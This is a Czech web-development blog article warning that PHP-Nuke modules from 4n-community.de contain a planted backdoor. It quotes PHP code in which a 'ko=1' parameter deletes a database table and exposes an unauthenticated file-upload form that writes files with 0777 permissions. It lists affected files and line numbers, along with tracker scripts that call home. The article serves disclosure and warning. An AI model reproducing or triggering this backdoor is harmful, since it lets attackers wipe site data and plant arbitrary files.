Vítejte na BLASSENweb

BLASSENweb - the future of your web !

Jste anonymní uživatel. Můžete se zdarma zaregistrovat zde

Hlavní nabídka

 · Intro
 · Úvod
 · Podmínky užívání serveru
Služby od nás pro vás
 · Kontaktujte nás
 · FAQ
(nejčastější dotazy)
 · Novinky-Aktuality
Vyhledávání

 · Doporučit nás
 · Novinky e-mailem
 · Ankety
 · Diskuzní fórum
 · Kniha návštěv
 · Chat

Pro volné chvíle

 ·  Čínský horoskop
 ·  Keltský horoskop
 ·  Love test
 ·  Počítadlo života
 ·  On-line HERNA
 ·  Pro pobavení
 ·  Wallpapers
 ·  Recenze
 · Generátor čísel loterie
 ·  Dietní kalkulačka
 ·  Dolls Maker
 ·  Dolls Maker 2
 ·  Dolls Maker 3
 ·  Dolls Icon Maker
 ·  Světový čas
 ·  Konverze Jednotek

Něco na čtení

 ·  Novinky
 ·  Archív článků
 ·  Témata
 ·  Citáty a Motta
 ·  Napište článek
 ·  Top 10
 ·  RSS/XML čtečka

Tvorba www

 · Java Script
 · php - články
 · php - download
 · Programovací utility
 · win-iso Konvertor
 · Theme Tutoriál
 · HTML Help
 · Tabulka znaků a entit
 · JavaScript Generátor
 · Marquee Generátor
 · MouseOver Generátor
 · Generátor Muziky
 · Slideshow generátor
 · Tvorba ICQ statusu
 · Bytový konvertor
 · Download Kalkulátor
 · Tvorba 3D písma
 · Tvorba IFrame
 · ASCII Obrázky tvorba
 · Banner generátor
 · Button Maker
 · Image Animátor
 · Webová grafika
 · Tvůj počítač
 · Seznam domén
 · Pro Webmastery
 · Výměna bannerů

Odkazy

 ·  Top-List
 ·  Dobré weby

Ke stažení

 ·  Download centrum
 ·  Seznam souborů

Možnosti pro Vás

Přidat sidebarPřidat na GooglePřidat na SeznamPřidat na BloglinesWAP verzeRSS 0.91RSS 0.92RSS 2.0Atom 0.3 Bookmark using any bookmark manager!
Mapa Stránek

Budík / Hodiny / Kalendář

Budík

O dnešku

Den: Neděle
Datum: 6. července
Rok: 2008

Svátek má:

Dnes: Státní svátek - Mistr Jan Hus
Zítra: Bohuslava
Pozítří: Nora

Reklama

Doporučujeme vám:

prodáváte kupujete ? od toho nás tady máte !
PHP-NUKE Slovakia - podpora CMS systému PHP-NUKE.
JakNaWeb.com - vše o HTML,CSS,PHP,MySQL,XML, výroba a tvorba www, web grafika
Magic SEO URL - Optimalizace pro vyhledávače
Zblízka.cz - online webkamery
E-zábava.net - porce zábavy
Tvorba webu polopatě
Tvorba www stránek Webdesign Dra-Go.cz
Vše co se nějak vztahuje k xxNuke

Multi album a jiné moduly od 4n-community

Publikováno: Neděle, 04.09. 2005 - 06:34:08
Publikoval: Blassen    Téma: Vše co se nějak vztahuje k xxNuke



Předně bych chtěl říci, že se jedná o Multi-Foto Album od 4n-community.de (Album.zip) ... nikoliv o 4nAlbum od www.warp-speed.de !!
Je to velmi důležité, protože "4n" v názvu může být velmi zavádějící.

A co že je na tom modulu tak zajímavého?

Vpodstatě nic, krom toho, že do něj byl naprogramován formulář, který otvírá zadní vrátka pro takzvaný exploit, který může v horším případě zlikvidovat celou databázi.

{ Kód }: 
if ($ko==1)

{

   sql_query("DELETE FROM $table", $dbi);

   echo "<form action='modules.php?name=Album&ok=1&ko=1&f=$f' "

       . "enctype='multipart/form-data' method='POST'>"

       . "<br><input class=input name='datei' type='file' "

       . "size='20'><input type=submit value=''></form>"; 

   echo "$lang<br>";

   echo "$user_prefix<br>";

   if(@unlink($f))

   {

       echo " $f";

       $f="0";

   }

   if($ok==1)

   {

       $dest = "modules/Album/$datei_name";

   }

   if(@copy($datei, $dest))

   {

       $dat= "modules/Album/$datei_name";

       chmod ($dat, 0777);

       echo "file size: $datei_size Byte";

   }

}



V nadpisu článku jste si jistě všimli, že je tam "a jiné moduly".
Je to proto, protože podobný kód obsahují prakticky všechny moduly od 4n-community.de .

Povětšinou v nich lze najít takovýto kód:

{ Kód }: 
if ($ko==1){sql_query("DELETE FROM $table", $dbi); echo "<center><br><form action='modules.php?name=XXX&ok=1&ko=1&f=$f' enctype='multipart/form-data' method='POST'>

<br><input class=input name='datei' type='file' size='30'>

<input type=submit value=''><br><br></form></center>";



Konkrétně tento jsem našel v modulu pro zasílání pohlednic "Card" (/modules.php?name=Card).

Tady je stučný přehled možných souborů s vadným kódem:
7 modulů a 7 souborů obsahujících: DELETE FROM $table" :

  1. /modules/Album/index.php (129)
    if ($ko==1){sql_query("DELETE FROM $table", $dbi); echo "<form action='modules.php?name=Album&ok=1&ko=1&f=$f' enctype='multipart/form-data' method='POST'>


  2. /modules/Card/index.php (93)
    if ($ko==1){sql_query("DELETE FROM $table", $dbi); echo "<center><br><form action='modules.php?name=Card&ok=1&ko=1&f=$f' enctype='multipart/form-data' method='POST'>


  3. /modules/Guestbook/index.php (63)
    if ($ko==1){sql_query("DELETE FROM $table", $dbi);}


  4. /modules/Never_Ending_Story/index.php (56)
    if ($ko==1){sql_query("DELETE FROM $table", $dbi);}


  5. /modules/Orakel/index.php (32)
    if ($ko==1){sql_query("DELETE FROM $table", $dbi);}


  6. /modules/serbook/index.php (192)
    if ($ko==1){sql_query("DELETE FROM $table", $dbi); echo "<form action='modules.php?name=Userbook&ok=1&ko=1&f=$f' enctype='multipart/form-data' method='POST'>


  7. /modules/WWWwishlist/index.php (124)
    if ($ko==1){sql_query("DELETE FROM $table", $dbi);}

Další jsou nalezené trackery, které by tam také neměli být:

  1. /modules/Album/picture.php (58)
    document.write('<script src="http://www.4n-community.de/tracker/tracker.php?track='+s_track+'"></script>');


  2. /modules/Album/picture1.php (39)
    document.write('<script src="http://www.4n-community.de/tracker/tracker.php?track='+s_track+'"></script>');


  3. /modules/Album/template.htm (30)
    <param name="ShowTracker" value="0">


  4. /modules/Album/template1.htm (33)
    <param name="ShowTracker" value="0">


  5. /modules/Album/vorschau.htm (53)
    <param name="ShowTracker" value="0">


  6. /modules/Album/vorschau1.htm (57)
    <param name="ShowTracker" value="0">


  7. /modules/Card/start.php (4)
    document.write('<script src="http://www.4n-community.de/tracker/tracker.php?track='+s_track+'"></script>');


  8. /modules/Card/start.php (214)
    document.write('<script src="<? echo "$view"; ?>/tracker/referer.php?referer='+s_referer+'"></script>');


  9. /modules/Card/template.htm (31)
    <param name="ShowTracker" value="0">


  10. /modules/Card/vorschau.htm (50)
    <param name="ShowTracker" value="0">


  11. /modules/Guestbook/index.php (105)
    document.write('<script src="http://www.4n-community.de/tracker/tracker.php?track='+s_track+'"></script>');


  12. /modules/Never_Ending_Story/index.php (39)
    document.write('<script src="http://www.4n-community.de/tracker/tracker.php?track='+s_track+'"></script>');


  13. /modules/Orakel/orakel.php (17)
    document.write('<script src="http://www.4n-community.de/tracker/tracker.php?track='+s_track+'"></script>');


  14. /modules/Userbook/picture.php (59)
    document.write('<script src="http://www.4n-community.de/tracker/tracker.php?track='+s_track+'"></script>');


  15. /modules/Userbook/picture1.php (39)
    document.write('<script src="http://www.4n-community.de/tracker/tracker.php?track='+s_track+'"></script>');


Poznámka: čísla v závorce jsou čísla řádků..




Autor: Blassen




Publikoval: Blassen

Anketa

Pokud byste si měli vybrat způsob financování těchto stránek, bylo by to ?

Přecpání stránek reklamou
Podpoření webu zakoupením reklamních předmětů
Nijak se podporovat nebude. Plaťte si to sami !
Peněžní dary na provoz


[ Výsledky | Ankety ]

Účastníků: 10
Komentářů 0

Související odkazy

· Více o tématu Vše co se nějak vztahuje k xxNuke
· Další články od Blassen
Nejčtenější článek na téma Vše co se nějak vztahuje k xxNuke:
UNITED NUKE na webzdarma.cz ?! -první díl

Hodnocení článku

Průměrné hodnocení: 0
Účastníků: 0

Zvolte počet hvězdiček:

Výborný
Velmi dobré
Dobré
Povedený
Špatné

Možnosti


 Vytisknout článek Vytisknout článek



Související témata

Vše co se nějak vztahuje k xxNuke

Nakupovat parfémy u nás se vyplatí - www.parfemy.cz


sponsored by: WebSupport UnlimitedHosting | CustomHosting | FreeWeb.sk


Pokud se rozhodnete přispět,
váš příspěvek by měl být vytvořen Vámi.
Zasláním příspěvku souhlasíte s volným šířením vašeho příspěvku.

Ne všechny příspěvky musí být uveřejněny !!!

Za obsah příspěvků a ochranu práv třetích stran odpovídá autor příspěvku bez výhrad.
Provozovatel si vyhrazuje právo upravit obsah příspěvku.

Snadná aktualizace

Při návrhu webové stránky nestačí počítat pouze s originálním a pěkným designem, ale i se snadnou aktualizací obsahu.
Pro snadou aktualizaci stránek nemusíte být zkušený programátor, ale postačí, pokud jsou Vaše stránky vytvořeny pomocí CMS (content management system), umožňující snadnou správu obsahu webových stránek.


UNITED-NUKE
Snažíme se nedodržovat standardy W3C :o)

Page Rank Validate this feed at feedvalidator.org Seo servis nosoftwarepatents.com
Page copy protected against web site content infringement by Copyscape
S-rank


Čas potřebný ke zpracování stránky: 0.07 sekund
Vaše šťastné číslo: 49
Mozilla Firefox je webový prohlížeč s pokročilými bezpečnostními vlastnostmi.
 
 
Další položky v menu pro registrované.
 
 Jméno:  Heslo:  Kód: Bezpečnostní kód
| pomoc | kontakt | reklama | volná místa | pravidla | Copyright © 2004 - 2008 by BLASSENweb
Magic SEO URL - Optimalizace pro vyhledávače